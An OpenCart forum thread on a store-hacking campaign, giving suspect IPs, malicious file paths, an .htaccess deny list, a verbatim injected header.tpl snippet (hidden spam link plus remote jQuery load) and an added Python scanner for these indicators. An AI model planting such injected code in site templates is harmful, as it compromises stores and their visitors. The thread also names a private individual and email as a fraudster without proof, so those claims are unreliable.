Common IPs used by the hackers:
1.55.210.180
1.54.*.*
113.190.139.39
US Proxy Servers
Files to look out for in your system:
system/helper/helper.php
download/ (yourfilenames[dot]random_characters[dot]php_random_characters)
modified trojan infected index.html in download folder
download/cp.php
Range of IP recommended to block as they switch between those IPs in Vietnam:
113.22.0.0/16
113.23.0.0/17
113.52.32.0/19
113.61.108.0/22
113.160.0.0/11
1.52.0.0/14
Anyway, the 113.x.x.x range has committed a lot of fraud recently.
They also attempt to create an admin user account in the system.
This so others can block them if they're not selling in that area.
Thanks for posting btw.
Norman in 't Veldt
Moderator OpenCart Forums
_________________ READ and Search BEFORE POSTING _________________
Our FREE search: Find your answer FAST!.
[How to] BTW + Verzend + betaal setup.
If they've used the same tool as they have to hack mine, you might also want to clear your /tmp directory as they have placed key files in mine to allow themselves ssh access.
JoseManuel wrote: Watch this topic open. http://forum.opencart.com/viewtopic.php?f=10&t=91623
I move that topic to the Moderators forum to have it analyzed.
The IPs and nationality of the attacks seen by me are not real.
Norman in 't Veldt
Moderator OpenCart Forums
And developers giving admin access to people to show their mods have to disable access to the download tab via the admin permission feature.
Is this all, or am I missing something?
The bad thing about these hackers is that they always forget to clear their footprints after they are done. And the bad thing about us is that we never take enough precautions. Best practice is to comment out the block of PHP code that does the uploading. Removing the JavaScript isn't enough. Or just change the folder's permissions.
i2Paq wrote: How would one go about blocking these via .htaccess?
This so others can block them if they're not selling in that area.
Thanks for posting btw.
# Comments are on their own lines: Apache does not allow a comment on the same line as a directive.
order allow,deny
allow from all
deny from 88.131.106.0/24
# Baidu Spider
deny from 180.76.5.0/24
# Baidu
deny from 220.181.108.0/24
deny from 208.83.156.0/24
deny from 113.22.0.0/16
deny from 113.23.0.0/17
deny from 113.52.32.0/19
deny from 113.61.108.0/22
deny from 113.160.0.0/11
deny from 1.52.0.0/14
And yesterday I got someone from Vietnam trying to steal my product by purchasing it at a very low price. The product price is $19.95 but he only paid $0.01 to my PayPal. I don't know how he can do it; fortunately the order status is pending so (maybe) he can't download the files.
Does anyone know which system files could have been hacked so that I cannot log in to admin?
Everyone be careful with these IPs:
113.166.96.13
123.21.178.196
93.139.33.141
And be careful with this name (he registered as Andrea Pots but I got his name in the PayPal payment details):
Minh Phuc Duong
paypal address: phucduongqb@zing.vn
The code was injected/inserted in the notification div id in the header.tpl file, so theme makers, please also check your demo link files; maybe it also happened to you, but I hope not.
Here is the code that has been injected:
<style>#getcms,.h1en{width:1px; height:1px; position:absolute; overflow:hidden;}</style>
<h1 class="h1en"><a href="http://cartcms.net" title="Cart CMS - Free Shopping Cart CMS" rel="dofollow">Cart CMS - Free Shopping Cart CSM</a>
<div id="getcms"></div></h1>
<script type="text/javascript"><!--
$(document).ready(function() {
$('#getcms').load('http://cartcms.net');
});
//--></script>
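Added example (not part of the original thread and not OpenCart code): a Python check that walks a store directory for the file names listed in the first post and for the header.tpl injection pattern shown above. The sample tree, the file names such as manual.pdf.a1b2c3.php_x9y8 and the example.invalid URL are constructed for the demonstration.

```python
import re, tempfile
from pathlib import Path

# Paths named in the thread, relative to the OpenCart root.
KNOWN_FILES = ["system/helper/helper.php", "download/cp.php"]
# Injection reported in the thread: a remote jQuery .load() and a 1px hidden box.
TEMPLATE_PATTERNS = {
    "remote .load()": re.compile(r"\.load\(\s*['\"]https?://", re.I),
    "1px hidden element": re.compile(
        r"width:\s*1px;\s*height:\s*1px;\s*position:\s*absolute", re.I),
}

def scan(root):
    """Return sorted (relative_path, reason) findings under an OpenCart root."""
    root, findings = Path(root), []
    for rel in KNOWN_FILES:
        if (root / rel).is_file():
            findings.append((rel, "file named in the thread"))
    # Uploads named like name.random.php_random still contain ".php".
    for f in (root / "download").glob("*"):
        if ".php" in f.name.lower() and f.name != "cp.php":
            findings.append((f"download/{f.name}", "PHP-like name in download folder"))
    for tpl in root.rglob("*.tpl"):
        text = tpl.read_text(encoding="utf-8", errors="replace")
        for reason, pattern in TEMPLATE_PATTERNS.items():
            if pattern.search(text):
                findings.append((tpl.relative_to(root).as_posix(), reason))
    return sorted(findings)

def build_sample(root):
    """Constructed sample tree: clean files plus three planted indicators."""
    tpl_dir = "catalog/view/theme/default/template/common/"
    files = {
        "system/helper/helper.php": "<?php // constructed placeholder",
        "download/manual.pdf.a1b2c3.php_x9y8": "constructed placeholder",
        "download/manual.pdf.d4e5f6": "constructed clean download",
        tpl_dir + "header.tpl": "<script>$('#x').load('http://example.invalid');</script>",
        tpl_dir + "footer.tpl": "<div id=\"footer\"></div>",
    }
    for rel, body in files.items():
        path = Path(root) / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body, encoding="utf-8")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        for path, reason in scan(tmp):
            print(f"{path}: {reason}")
```

A hit is only a lead to inspect by hand; a clean result does not show the store is untouched, since the file names can differ between incidents.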